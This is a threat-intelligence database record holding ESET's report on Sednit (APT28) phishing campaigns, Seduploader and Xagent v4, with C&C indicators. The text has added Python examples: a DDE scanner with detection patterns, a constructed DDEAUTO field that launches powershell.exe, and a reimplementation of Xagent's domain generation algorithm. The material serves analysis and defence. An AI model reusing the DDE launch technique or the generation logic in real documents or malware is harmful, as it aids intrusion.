{
	"id": "1d25cd7b-adfa-412c-87ca-5754f0415872",
	"created_at": "2026-04-06T00:16:07.51865Z",
	"updated_at": "2026-04-10T03:37:50.109567Z",
	"deleted_at": null,
	"sha1_hash": "de4e6aa992a4ff73f9b6d7fb281f149c35a0bac7",
	"title": "Sednit update: How Fancy Bear Spent the Year",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2908682,
	"plain_text": "Sednit update: How Fancy Bear Spent the Year\r\nBy ESET Research\r\nArchived: 2026-04-05 22:52:01 UTC\r\nThe Sednit group — also known as Strontium, APT28, Fancy Bear or Sofacy — is a group of attackers operating since 2004, if not earlier, whose main objective is to steal confidential information from specific targets.\r\nThis article is a follow-up to ESET’s presentation at BlueHat in November 2017. Late in 2016 we published a white paper covering Sednit activity between 2014 and 2016. Since then, we have continued to actively track Sednit's operations, and today we are publishing a brief overview of what our tracking uncovered in terms of the group’s activities and updates to their toolset. The first section covers the update of their attack methodology: namely, the ways in which this group tries to compromise their targets' systems. The second section covers the evolution of their tools, with a particular emphasis on a detailed analysis of a new version of their flagship malware: Xagent.\r\nThe Campaigns\r\nOver the past few years the Sednit group has used various techniques to deploy their components on targets' computers. The attack usually starts with an email containing either a malicious link or a malicious attachment. We have seen a shift in the methods they used over the course of the year, though. Sedkit was their preferred attack vector in the past, but that exploit kit has completely disappeared since late 2016. The DealersChoice exploit platform has been their preferred method since the publication of our white paper, but we also saw other methods being used by this group, such as macros or Microsoft Word Dynamic Data Exchange.\r\nThe following three sections describe the different methods used by Sednit’s operators to gain an initial foothold on a target system. Generally, these campaigns try to install Seduploader on the target system. 
Seduploader is a first-stage backdoor that can be used to assess the target’s importance and download additional malware. If the system is indeed of interest to them, it is likely that Sednit’s operators will eventually install Xagent on it.\r\nSedkit (Sednit Exploit Kit)\r\nSedkit was an exploit kit used exclusively by the Sednit group. During its lifetime, Sednit leveraged vulnerabilities in various persistently vulnerable applications, but mostly Adobe Flash and Internet Explorer. When Sedkit was first discovered, potential victims were redirected to its landing page through a watering-hole scheme. Following that campaign, their preferred method consisted of malicious links embedded in emails sent to Sednit’s targets. Sedkit’s workflow is illustrated below.\r\nBetween August and September 2016, we saw several different email campaigns trying to lure the recipients of their messages to a Sedkit landing page. Sedkit’s targets at that time were mostly embassies and political parties in Central Europe. The next figure shows an email containing such a URL.\r\nhttps://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/\r\nPage 1 of 10\r\nThe email tries to fool its recipient into believing that the link will ultimately lead to an interesting news story. In this case, the article is supposedly about an earthquake that struck near Rome in August 2016. While the email impersonates someone the victim would consider trustworthy, there are two major hints that could lead an attentive recipient to conclude that this email is fake. The first one is that there are spelling mistakes (e.g. “Greetigs!”). Spelling mistakes are common in malicious Sednit emails. The second one is the URL’s domain part. It is a purely malicious domain, but the path part of the URL mimics a real, legitimate link. In this particular case, the URL path is the same as one used in a BBC story about this earthquake. 
Again, this is a commonly used Sednit tactic: popular stories found on legitimate news websites are used as bait, and targets that click on the emailed URL are redirected to the real website, but not before visiting the Sedkit landing page. Besides the BBC, The Huffington Post is another popular media outlet whose stories they like to use as bait.\r\nThe email shown below, where the link redirects to Sedkit, exhibits several interesting features.\r\nFirstly, the email’s subject and URL path are not aligned: the former refers to Syria and Aleppo while the latter refers to WADA and Russian hacking. Secondly, there are two glaring spelling mistakes. The first one is again the use of \"Greetigs!\" and the second one is \"Unated Nations\". Hopefully, someone working for the United Nations’ public relations department would not have such a glaring error in their email signature block.\r\nThe last campaign using Sedkit was observed in October 2016. It is interesting to note that the disappearance of Sedkit follows a trend we have seen with other exploit kits. Most of these relied on exploits for older versions of Internet Explorer and/or Flash to perform drive-by downloads. The decline of the majority of exploit kit operations during 2016, including Sedkit, could well be attributable to the code hardening performed by Microsoft and Adobe.\r\nFull details of Sedkit's inner workings can be found in our previously published white paper.\r\nDealersChoice\r\nIn August 2016, Palo Alto Networks blogged about a new platform used by Sednit for initial compromise. This platform, which they called DealersChoice, has the ability to generate malicious documents with embedded Adobe Flash Player exploits. There are two variants of this platform. 
The first one checks which Flash Player version is installed on the system and then selects one of three different vulnerabilities. The second variant first contacts a C\u0026C server, which delivers the selected exploit and the final malicious payload. Of course, the second variant is much harder to analyze, as the document delivered to the targets does not contain all the pieces of the puzzle.\r\nThis platform is still in use today by Sednit and, like Sedkit, tracks international news stories and includes a reference to them in the malicious emails, in an attempt to lure the target into opening the malicious document attachment. Sometimes, they also use other, non-political, schemes. In December 2016, they used a rather unusual (for the group) lure:\r\nThis email was sent to multiple Ministries of Foreign Affairs and embassies in Europe on December 22nd and 23rd, and contained a Word document attachment that appeared to be a Christmas eCard. Note that this was the first time that we saw the Sednit group use a non-geopolitical phishing gambit attempting to trap their targets. Of course, the Word document, if opened, uses DealersChoice to try to compromise the system. Sednit used DealersChoice intensively in late 2016, but the platform was not seen for a long time after that. In fact, the first time we saw them use it in 2017 was in October.\r\nWe do not have the email used for this particular campaign, but, based on the decoy document, we can assume that government agency employees were the targets. Other campaigns using DealersChoice were the subject of different blogs published by security researchers. One noteworthy example is the one by Proofpoint where they detail the addition of a new Adobe Flash Player vulnerability to the DealersChoice platform. 
This indicates that this platform is still in use by this group and under constant development.\r\nMacros, VBA and DDE\r\nBesides Sedkit and DealersChoice, Sednit’s operators also continued using proven ways to compromise the systems they target, relying on macros in Microsoft Office documents, but also used other methods. One campaign that grabbed a lot of attention targeted an Eastern European MFA in April 2017. The following email was sent to an MFA employee:\r\nThe attachment contained code exploiting two zero-days: one local privilege escalation (LPE) and one remote code execution (RCE). These two zero-days were reported by ESET to Microsoft. A detailed analysis of this campaign can be found on our blog.\r\nThe final case highlighted here illustrates how Sednit’s operators pay close attention to new technical developments in security. At the beginning of October 2017, SensePost researchers wrote an article on a Microsoft Word feature, the Dynamic Data Exchange (DDE) protocol. DDE is a way to exchange data between applications. For example, it allows a Word table to be updated with the data contained in an Excel document. It is convenient, but in the case of at least Word and Excel it can also be used to execute arbitrary code, if the user ignores several warning prompts. Following the publication of that article, it did not take long to discover Sednit campaigns using DDE to execute code from a C\u0026C server. 
In these campaigns, documented by McAfee, the decoy document is empty, but it contains a hidden field containing the following code:\r\n\"C:\\\\Programs\\\\Microsoft\\\\Office\\\\MSWord.exe\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\r\nIf the intended victim opens the document and makes the foolhardy choice to ignore the warnings, the above command runs PowerShell, which downloads the Seduploader binary from the C\u0026C server and executes it on the target’s system. Note that the field reaches powershell.exe by starting from a path under the Office directory and walking up four levels to System32; a quoted executable path with parent-directory hops where Word expects an application name is a reliable thing to hunt for in DDE fields.\r\nThis is only a brief overview of how the Sednit operators have been trying to compromise new victims since the publication of our white paper. As you can see, they are just as active as they were and are still actively targeting governments worldwide.\r\nTooling\r\nThe previous section shows how the Sednit group spent the last year from the infection-vector point of view. This section describes the changes that this group made to their toolset. In 2016, ESET released a deep analysis of each component; it is available here.\r\nOver the years the group developed a lot of components to infect, gather and steal information from their targets. Some of these components have disappeared since, while others have been improved.\r\nSeduploader\r\nSeduploader serves as reconnaissance malware. It is made up of two distinct components: a dropper, and the persistent payload installed by this dropper. Seduploader is still used by the Sednit group but it has received a few improvements. During the April 2017 campaign a new version of Seduploader came out with some new features, such as a screenshot function or the ability to directly execute code loaded into memory from the C\u0026C server. 
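The DDE field quoted above in the Macros, VBA and DDE section is an artefact a defender can hunt for before any user sees the warning prompts: Word keeps field instructions inside the document's OOXML parts, so a .docx can be checked offline for DDE/DDEAUTO fields whose 'application' is really a path to a scripting host. The scanner below is an added example written for this page; it is not ESET's code and not taken from the McAfee write-up. The document it builds is constructed for the demonstration (one legitimate DDE link to Excel in the body, one Sednit-style DDEAUTO field with a parent-directory traversal to powershell.exe hidden in a footer); the indicator list and the placeholder PowerShell arguments are this example's assumptions, not the campaign's actual command line.

```python
'''Scan Word .docx files for DDE/DDEAUTO field codes. Added example; not ESET's code.'''
import html
import io
import re
import zipfile
from dataclasses import dataclass, field
from typing import List

# Word stores a field either inline (<w:fldSimple w:instr="...">) or as a "complex"
# field whose instruction is split over <w:instrText> runs between fldChar
# begin/separate/end markers.  One regex walks both forms in document order.
TOKEN = re.compile(
    r'<w:fldChar\b[^>]*\bw:fldCharType="(?P<kind>begin|separate|end)"'
    r'|<w:instrText\b[^>]*>(?P<text>.*?)</w:instrText>'
    r'|<w:fldSimple\b[^>]*\bw:instr="(?P<instr>[^"]*)"',
    re.S,
)
DDE_FIELD = re.compile(r'^(DDEAUTO|DDE)\b', re.I)

# Indicators (this example's assumptions) for the Sednit-style field: a full path
# with parent-directory hops to a scripting host where Word expects an application
# name, plus the usual PowerShell download/decode vocabulary.
INDICATORS = [
    (re.compile(r'\.\.\\'), 'parent-directory traversal in the application path'),
    (re.compile(r'\b(powershell|cmd|mshta|wscript|cscript|rundll32|regsvr32)\b', re.I),
     'scripting host used as the DDE application'),
    (re.compile(r'\.exe\b', re.I), 'executable path instead of an application name'),
    (re.compile(r'\b(downloadstring|webclient|iex|frombase64string)\b|-enc', re.I),
     'download/decode keywords in the DDE topic'),
]
# Parts of a .docx that can carry fields; headers and footers are easy to overlook.
FIELD_PARTS = re.compile(r'word/(document|header\d*|footer\d*|footnotes|endnotes)\.xml')


@dataclass
class Finding:
    part: str
    instruction: str
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def extract_field_instructions(xml: str) -> List[str]:
    '''Return every field instruction in one OOXML part, whitespace-normalised.'''
    found, depth, buf = [], 0, []
    for m in TOKEN.finditer(xml):
        if m.group('instr') is not None:          # simple field: instruction in attribute
            found.append(html.unescape(m.group('instr')))
        elif m.group('text') is not None:         # fragment of a complex field
            if depth:
                buf.append(html.unescape(m.group('text')))
        elif m.group('kind') == 'begin':
            depth += 1
        elif m.group('kind') == 'end':
            depth -= 1
            if depth == 0 and buf:                # outermost field closed: emit it
                found.append(''.join(buf))
                buf = []
    return [re.sub(r'\s+', ' ', f).strip() for f in found]


def classify(part: str, instruction: str) -> Finding:
    '''Attach every matching indicator to a DDE field instruction.'''
    return Finding(part, instruction,
                   [why for rx, why in INDICATORS if rx.search(instruction)])


def scan_docx(data: bytes) -> List[Finding]:
    '''Report every DDE/DDEAUTO field in the body, headers, footers and notes.'''
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not FIELD_PARTS.fullmatch(name):
                continue
            for instr in extract_field_instructions(z.read(name).decode('utf-8', 'replace')):
                if DDE_FIELD.match(instr):
                    findings.append(classify(name, instr))
    return findings


def build_sample_docx() -> bytes:
    '''Constructed test document (not a real Sednit sample): a legitimate DDE link to
    Excel in the body, and a Sednit-style DDEAUTO field hidden in the footer whose
    application is a traversal from Word's install path to powershell.exe.  The
    PowerShell arguments are a placeholder, not the real campaign's command line.'''
    body = ('<w:document><w:body><w:p>'
            '<w:fldSimple w:instr=" DDE Excel &quot;C:\\Reports\\q3.xlsx&quot; Sheet1!R1C1 "/>'
            '<w:fldSimple w:instr=" PAGE "/></w:p></w:body></w:document>')
    footer = ('<w:ftr><w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>'
              '<w:r><w:instrText xml:space="preserve"> DDEAUTO &quot;C:\\Programs\\Microsoft'
              '\\Office\\MSWord.exe\\..\\..\\..\\..\\Windows\\System32\\WindowsPowerShell'
              '\\v1.0\\powershell.exe&quot;</w:instrText></w:r>'
              '<w:r><w:instrText xml:space="preserve"> &quot;-NoP -W Hidden -c IEX(placeholder)&quot; '
              '</w:instrText></w:r>'
              '<w:r><w:fldChar w:fldCharType="separate"/></w:r><w:r><w:t>Page 1</w:t></w:r>'
              '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p></w:ftr>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as z:
        z.writestr('word/document.xml', body)
        z.writestr('word/footer1.xml', footer)
    return buf.getvalue()


if __name__ == '__main__':
    for f in scan_docx(build_sample_docx()):
        print(('SUSPICIOUS' if f.suspicious else 'dde-link  '), f.part, f.instruction)
        for why in f.reasons:
            print('             -', why)
```

The benign Excel link is still reported (any DDE field deserves a look, and it is what the prompts protect), but only the footer field collects indicators: the traversal, the scripting host, the explicit .exe and the download keyword. Scanning headers, footers and notes matters because a field there never shows up in the visible body of an 'empty' decoy.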
Recently, we have seen the Seduploader dropper replaced by PowerShell commands delivering the Seduploader payload.\r\nXtunnel\r\nXtunnel is a network proxy tool that can relay any kind of network traffic between a C\u0026C server on the Internet and an endpoint computer inside a local network. Xtunnel is still used by the Sednit group.\r\nSedkit\r\nSedkit is the Sednit exploit kit; it was used only for targeted attacks, starting with targeted phishing emails with URLs that spoof legitimate URLs. October 2016 is the last time we are aware that Sedkit was used.\r\nSedreco\r\nSedreco serves as a spying backdoor; its functionality can be extended with dynamically loaded plugins. It is made up of two distinct components: a dropper and the persistent payload installed by this dropper. We have not seen this component since April 2016.\r\nUSBStealer\r\nUSBStealer is a tool that extracts sensitive information from air-gapped networks. We have not seen this component since mid 2015.\r\nXagent\r\nXagent is a modular backdoor with spying functionalities such as keystroke logging and file exfiltration. Xagent is the group's flagship backdoor and is heavily used in their operations. Early versions for Linux and Windows were seen years ago, then in 2015 an iOS version came out. One year later, an Android version was discovered and finally, at the beginning of 2017, an Xagent sample for OS X was described.\r\nWe saw a new version of the Windows version of Xagent last February. Because of the following strings found in the binaries, we deduced that it was version 4 of the backdoor. The different versions of Xagent’s modules are listed in Table 1.\r\nTable 1. Xagent versioning\r\nmodule/channel              v3 uid  v4 uid\r\nAgentKernel                 3303    4401\r\nWinHttp                     2111    4402\r\nModuleFileSystem            2103    4411\r\nModuleRemoteKeyLogger       2107    4412\r\nProcessRetranslatorModule   2106    4413\r\nUnknown [1]                 ??      4414\r\nVersion 4 of Xagent came with new techniques for string obfuscation, and all run-time type information (RTTI) is obfuscated as well. These techniques significantly change the way strings are encrypted, with a method unique to each binary. Previous versions of Xagent used an XOR loop to decrypt strings. The new encryption algorithm is a series of operations with values probably generated at compile time. The following figure illustrates the complexity of the code. However, the Hex-Rays decompiler does a decent job of simplifying it. Here is an example:\r\nreturn (((((a2 ^ (((((((((((a1 - 13 + 42) ^ 0x7B) + 104) ^ 0x72) - 81 - a2 - 76) ^ 0x31) + 75) ^ 0x3B) + 3) ^ 0x40) + 100\r\nThe AgentKernel can receive commands from the C\u0026C server to interact with modules and channels. Some of the previously seen C\u0026C commands have been removed, and some new ones added.\r\nEarlier versions supported command 2, PING_REQUEST. This has been removed in version 4, but the operator can still get the list of modules with the command GET_AGENT_INFO, which is more verbose than the previous command. Commands 34, 35 and 36 show similarities with SET_PARAMETERS, which allows interaction with LocalStorage, the kernel store. It contains both file-based storage for communication with the C\u0026C server and Windows registry-based storage for various configuration parameters.\r\nA new feature implemented in the WinHttp channel is a domain generation algorithm (DGA) for fallback domains. The WinHttp channel is the channel responsible for communicating with the C\u0026C server. 
Unlike the usual DGA, which derives its seed from a pseudo-random source, this one uses a fixed seed (probably generated at compile time) for a given sample, so the set of fallback domains a sample can produce is fixed and can be enumerated once the seed and tables are recovered from it. The way that domains are generated is as follows:\r\n- a suite of operations is applied to the seed;\r\n- the result gives an offset into each of three different arrays (adding another seed for each array);\r\n- once the new offset is calculated (offset + seed), the word at that position is decrypted;\r\n- all words are concatenated (four words are used to generate the domain; the fourth word comes from the first array but with a different offset);\r\n- the \".com\" suffix is added.\r\nThe development of the backdoor, with the addition of new features and compatibility with all major platforms, makes Xagent the core backdoor used by the group.\r\nDealersChoice\r\nDealersChoice is a platform that generates malicious documents containing embedded Adobe Flash files. Palo Alto Networks researchers analyzed two variants: variant A, which is a standalone variant including Flash exploit code packaged with a payload, and variant B, which is a modular variant that loads exploit code on demand. This new component appeared in 2016 and is still in use.\r\nDowndelph\r\nDowndelph is a lightweight downloader developed in the Delphi programming language. As we already mentioned in our white paper, its period of activity was from November 2013 to September 2015 and no new variants have been seen since.\r\nSummary\r\nThe Sednit group is without a doubt still an active group. The main entry point for their flagship backdoor is phishing emails, and they seem to have a great deal of success with that technique. Xagent is the core of their operation, which we can now find on any and all major platforms, mobile or not. The newest version of Xagent is very interesting and the operators seem to have put a lot of work into it. 
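Before the IoCs, here is the WinHttp fallback DGA described in the Xagent section above, carried through as runnable code. This is an added example, not code from ESET or from any Xagent sample: the word tables, the per-table XOR keys, the seeds and the 'suite of operations' are constructed for illustration (ESET did not publish them), and since the article does not say how the backdoor moves from one fallback domain to the next, re-mixing the previous value is this example's assumption. What the structure shows is the defender's point: with a fixed seed and the tables lifted from one sample, every fallback that sample can ever resolve is computable offline.

```python
'''Structure of the Xagent v4 WinHttp fallback DGA as described by ESET, with
constructed tables and constants. Added example; not the malware's code.'''
from typing import List, Tuple

MASK32 = 0xFFFFFFFF

# Three word tables as they might sit in the binary: each word XOR-encrypted with a
# per-table key so the plaintext never appears in the file. All values constructed.
_TABLE_KEYS = (0x5A, 0xC3, 0x2F)
_PLAIN_WORDS = (
    ('cloud', 'secure', 'media', 'data', 'web', 'file', 'net'),
    ('store', 'delivery', 'service', 'host', 'view'),
    ('panorama', 'group', 'codec', 'res', 'invest', 'band'),
)
ENCRYPTED_TABLES: Tuple[Tuple[bytes, ...], ...] = tuple(
    tuple(bytes(b ^ key for b in word.encode()) for word in table)
    for table, key in zip(_PLAIN_WORDS, _TABLE_KEYS)
)
# "adding another seed for each array": a per-table constant added to the offset.
TABLE_SEEDS = (3, 7, 11)


def mix(seed: int) -> int:
    '''The "suite of operations" applied to the seed. Constants are invented; the
    arithmetic is kept to 32 bits like the compiler-generated code in the sample.'''
    x = (seed ^ 0x7B3A1E05) & MASK32
    x = (x * 0x9E3779B1 + 0x1F2E3D4C) & MASK32
    x ^= x >> 13
    return x & MASK32


def decrypt_word(table: int, offset: int) -> str:
    '''Step 3: (offset + table seed) selects an entry, which is decrypted in place.'''
    entries = ENCRYPTED_TABLES[table]
    blob = entries[(offset + TABLE_SEEDS[table]) % len(entries)]
    return bytes(b ^ _TABLE_KEYS[table] for b in blob).decode()


def generate_domain(seed: int) -> str:
    '''One fallback domain from one seed, following the five steps in the text:
    mix the seed, derive an offset per table, decrypt four words (the fourth from
    the first table at a different offset), concatenate, append .com.'''
    x = mix(seed)
    offsets = [(x >> shift) & 0xFF for shift in (0, 8, 16, 24)]
    words = [decrypt_word(0, offsets[0]), decrypt_word(1, offsets[1]),
             decrypt_word(2, offsets[2]), decrypt_word(0, offsets[3])]
    return ''.join(words) + '.com'


def enumerate_fallbacks(seed: int, count: int) -> List[str]:
    '''Defender's view: with the seed and tables lifted from one sample, the fallback
    set is finite and precomputable. Advancing by re-mixing the previous value is
    this example's assumption; ESET does not describe how Xagent steps to the next
    fallback.'''
    domains, x = [], seed
    for _ in range(count):
        domains.append(generate_domain(x))
        x = mix(x)
    return domains


if __name__ == '__main__':
    for d in enumerate_fallbacks(0x1234ABCD, 5):
        print(d)
```

Because nothing in the chain depends on the clock, two runs with the same seed give the same list, which is exactly why a per-sample fixed seed is weaker for the operator than a date-seeded DGA: once a sample is unpacked, its fallback domains can be sinkholed or blocked in advance rather than predicted day by day.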
Since the discovery we have seen two instances of Xagent in the wild: one with the channel and the unknown module only, and one with all modules and the channel but without the unknown module. We can hypothesize that the Sednit group added another layer of checking on its targets by dropping an Xagent with just a few modules and, if the victim is interesting enough, dropping another version with all modules.\r\nIoCs\r\nTable 2. Phishing\r\nPhishing document | SHA-1 | ESET detection\r\nBulletin.doc | 68064fc152e23d56e541714af52651cb4ba81aaf | Win32/Sednit.AX\r\nBulletin.doc | f3805382ae2e23ff1147301d131a06e00e4ff75f | Win32/Exploit.CVE-4117.A\r\nOC_PSO_2017.doc | 512bdfe937314ac3f195c462c395feeb36932971 | Win32/Exploit.Agent\r\nNASAMS.doc | 30b3e8c0f3f3cf200daa21c267ffab3cad64e68b | Win32/Exploit.Agent\r\nProgramm_Details.doc | 4173b29a251cd9c1cab135f67cb60acab4ace0c5 | Win32/Exploit.Agent\r\nOperation_in_Mosul.rtf | 12a37cfdd3f3671074dd5b0f354269cec028fb52 | Win32/Exploit.Agent\r\nARM-NATO_ENGLISH_30_NOV_2016.doc | 15201766bd964b7c405aeb11db81457220c31e46 | SWF/Agent.L\r\nOlympic-Agenda-2020-20-20-Recommendations.doc | 8078e411fbe33864dfd8f87ad5105cc1fd26d62e | Win32/Exploit.Agent\r\nMerry_Christmas!.docx | 33447383379ca99083442b852589111296f0c603 | Win32/Exploit.Agent\r\nTrump’s_Attack_on_Syria_English.docx | d5235d136cfcadbef431eea7253d80bde414db9d | Win32/Exploit.Agent\r\nHotel_Reservation_Form.doc | f293a2bfb728060c54efeeb03c5323893b5c80df | Win32/Sednit.BN\r\nSB_Doc_2017-3_Implementation_of_Key_Taskings_and_Next_Steps.doc | bb10ed5d59672fbc6178e35d0feac0562513e9f0 | Win32/Sednit.BN\r\nSB_Doc_2017-3_Implementation_of_Key_Taskings_and_Next_Steps.doc | 4873bafe44cff06845faa0ce7c270c4ce3c9f7b9 | Win32/Sednit.BN\r\nSB_Doc_2017-3_Implementation_of_Key_Taskings_and_Next_Steps.doc | 169c8f3e3d22e192c108bc95164d362ce5437465 | Win32/Sednit.BN\r\nSB_Doc_2017-3_Implementation_of_Key_Taskings_and_Next_Steps.doc | cc7607015cd7a1a4452acd3d87adabdd7e005bd7 | Win32/Sednit.BN\r\nCaucasian_Eagle_ENG.docx | 5d2c7d87995cc5b8184baba2c7a1900a48b2f42d | Win32/Exploit.Agent\r\nWorld War3.docx | 7aada8bcc0d1ab8ffb1f0fae4757789c6f5546a3 | SWF/Exploit.CVE-20 11292.A\r\nSaberGuardian2017.docx | 68c2809560c7623d2307d8797691abf3eafe319a | VBA/DDE.E\r\nIsisAttackInNewYork.docx | 1c6c700ceebfbe799e115582665105caa03c5c9e | VBA/DDE.L\r\nTable 3. Seduploader Samples\r\nSHA-1 | ESET detection | C\u0026C server\r\n9f6bed7d7f4728490117cbc85819c2e6c494251b | Win32/Sednit.AX | servicecdp[.]com:87.236.211[.]182\r\n6e167da3c5d887fa2e58da848a2245d11b6c5ad6 | Win32/Sednit.BG | runvercheck[.]com:185.156.173[.]70, remsupport[.]org:191.101.31[.]96\r\ne338d49c270baf64363879e5eecb8fa6bdde8ad9 | Win32/Sednit.BG | wmdmediacodecs[.]com:95.215.45[.]43\r\nf9fd3f1d8da4ffd6a494228b934549d09e3c59d1 | Win32/Sednit.BN | mvband[.]net:89.45.67[.]144, mvtband[.]net:89.33.246[.]117\r\n476fc1d31722ac26b46154cbf0c631d60268b28a | Win32/Sednit.BN | viters[.]org:89.187.150[.]44\r\n8a68f26d01372114f660e32ac4c9117e5d0577f1 | Win32/Sednit.BN | myinvestgroup[.]com:146.185.253[.]132\r\n9c47ca3883196b3a84d67676a804ff50e22b0a9f | Win32/Sednit.BR | space-delivery[.]com:86.106.131[.]141\r\nab354807e687993fbeb1b325eb6e4ab38d428a1e | Win32/Sednit.BS | satellitedeluxpanorama[.]com:89.34.111[.]160\r\n4bc722a9b0492a50bd86a1341f02c74c0d773db7 | Win32/Sednit.BS | webviewres[.]net:185.216.35[.]26\r\nTable 4. Xagent Samples\r\nSHA-1 | ESET detection | C\u0026C server\r\n6f0fc0ebba3e4c8b26a69cdf519edf8d1aa2f4bb | Win64/Sednit.Z | movieultimate[.]com\r\ne19f753e514f6adec8f81bcdefb9117979e69627 | Win64/Sednit.Z | meteost[.]com\r\n961468ddd3d0fa25beb8210c81ba620f9170ed30 | Win32/Sednit.BO | faststoragefiles[.]org\r\na0719b50265505c8432616c0a4e14ed206981e95 | Win32/Sednit.BO | nethostnet[.]com\r\n2cf6436b99d11d9d1e0c488af518e35162ecbc9c | Win64/Sednit.Y | faststoragefiles[.]org\r\nfec29b4f4dccc59770c65c128dfe4564d7c13d33 | Win64/Sednit.Y | fsportal[.]net\r\n57d7f3d31c491f8aef4665ca4dd905c3c8a98795 | Win64/Sednit.Z | fastdataexchange[.]org\r\na3bf5b5cf5a5ef438a198a6f61f7225c0a4a7138 | Win32/Sednit.BO | newfilmts[.]com\r\n1958e722afd0dba266576922abc98aa505cf5f9a | Win32/Sednit.BO | newfilmts[.]com\r\n[1] We weren't able to match this module with previous well-known modules\r\nSource: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE",
		"ETDA"
	],
	"references": [
		"https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/"
	],
	"report_names": [
		"sednit-update-fancy-bear-spent-year"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
